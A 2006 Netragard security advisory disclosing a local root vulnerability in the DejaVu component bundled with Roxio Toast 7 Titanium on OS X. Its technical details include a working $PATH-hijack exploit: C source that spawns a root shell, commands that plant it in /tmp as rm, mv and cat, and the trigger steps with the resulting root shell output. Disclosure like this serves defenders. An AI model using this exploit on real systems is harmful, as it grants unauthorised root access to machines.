Netragard Security Advisory 2006-06-24

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
**********************************************************************  
Netragard, L.L.C. -- Vulnerability Research and Exploitation Team  
  
www.netragard.com   
  
[Advisory Information]  
- ----------------------------------------------------------------------  
Contact: : Adriel T. Desautels  
Advisory ID : NETRAGARD-20060624  
Product Name : Roxio Toast  
Product Version : 7 Titanium  
Vendor Name : Roxio  
Type of Vulnerability : Local Root Compromise  
Effort : Easy  
Operating System : OSX  
Other : Insecure usage of $PATH  
  
  
  
[Product Description]  
- ----------------------------------------------------------------------  
"Toast 7 is the best way to save, share and enjoy a lifetime of digital  
music, movies and photos on CD and DVD. Burn large files across  
multiple discs; compress and copy DVD movies; add over 50 hours of  
music to an audio DVD with on-screen TV menus, shuffle play, and rich  
Dolby Digital sound; burn DivX files into DVDs. Do it all with the  
fastest and most reliable burning software for the Mac OS - Toast."  
  
- --http://www.roxio.com--  
  
  
  
[Technical Summary]  
- ----------------------------------------------------------------------  
Doing a default installation of Roxio Toast 7 Titanium also installs  
DejaVu which is used for backups. DejaVu uses a control panel helper  
application which makes isecure system() calls. More specifically,  
an attacker can exploit these system() calls using the user controlled  
environment variable named $PATH and gain root access to the system.  
  
  
  
[Technical Details]  
- ----------------------------------------------------------------------  
  
This was tested using a configured version of Roxio Toast 7 Titanium.  
  
  
Roxio 7 Toast contains locally exploitable vulnerabilities due to  
insecure system() by calls by suid binaries which use the users $PATH  
environment variable.  
  
The following shows the DejaVu suid binaries:  
  
netragard-test-1$ find . -perm -4000  
./DejaVu.prefPane/Contents/Resources/abort_backup  
./DejaVu.prefPane/Contents/Resources/archive_table  
./DejaVu.prefPane/Contents/Resources/install_crontab  
./DejaVu.prefPane/Contents/Resources/install_scripts  
./DejaVu.prefPane/Contents/Resources/manual_backup  
./DejaVu.prefPane/Contents/Resources/remove_scripts  
  
  
1-Exploitation is trivial. A user must first create small program such  
as the one demonstrated by simple.c below.  
  
netragard-test-1$ cat > simple.c  
  
main()  
{  
seteuid(0);  
setuid(0);  
setegid(0);  
setgid(0);  
system("/bin/sh -i");  
}  
  
2-Once the user has created the program, the user must comple the  
program, copy the program to replace rm, mv and cat, and insert it  
into the $PATH variable.  
  
netragard-test-1$cc -o chmod simple.c  
netragard-test-1$cp chmod /tmp/rm  
netragard-test-1$cp chmod /tmp/mv  
netragard-test-1$cp chmod /tmp/cat  
netragard-test-1$export PATH=/tmp/:$PATH  
  
3-Once the user has finished with step 2, the user must then launch  
the "System Preferences" control pannel.  
  
netragard-test-1$/Applications/System\  
Preferences.app/Contents/MacOS/System\ Preferences  
  
4-After the user has launched the Systems Preferences helper  
application, a GUI window should display. From that window click on  
"Deja Vu" located in the "other" section. From there create a manual  
backup and then click the backup button. At that point you should be  
presented with a root shell prompt:  
  
sh: no job control in this shell  
sh-2.05b# id  
  
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm),  
79(appserverusr), 80(admin)  
  
  
  
[Proof Of Concept]  
- ----------------------------------------------------------------------  
Successful Created and Functional  
  
  
  
[Vendor Status]  
- ----------------------------------------------------------------------  
Vendor contacted and notified of the issue.  
  
Vendor Comment:  
Deja Vu, the affected component of Roxio Toast, is bundled into Roxio  
Toast and is third party software. Deva Vu is authored by Propaganda  
Productions and not Sonic.  
  
  
[About Netragard]  
- ----------------------------------------------------------------------  
Netragard offers specialized application and network security services  
which enable its clients to take a proactive security stance. Each of  
our services is driven by security professionals who specialize in  
specific areas of Information Security. This specialized focus  
differentiates Netragard from the competition by enabling Netragard  
to produce deliverables which are the product of skilled security  
professionals and not the product of automated tools and scripts.  
  
  
[ For more information please visit http://www.netragard.com ]  
  
  
[Disclaimer]  
- ---------------------http://www.netragard.com-------------------------  
Netragard, L.L.C. assumes no liability for the use of the information  
provided in this advisory. This advisory was released in an effort to  
help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
- --  
  
  
Regards,  
Netragard Vulnerability Research Team  
advisories at netragard dot com  
http://www.netragard.com  
-------------------------  
"We make I.T. Secure"  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.2 (MingW32)  
  
iD8DBQFE5NjPNn0v/IJLeTQRAlWRAKCXHq1wgbdJBcAupZQK8IOSDvRGagCg21tX  
DFni9FJEXsz1LY/syMSFt1k=  
=1Iqk  
-----END PGP SIGNATURE-----  
  
  
  
  
BullGuard Anti-virus has scanned this e-mail and found it clean.  
Try BullGuard for free: www.bullguard.com  
  
  
`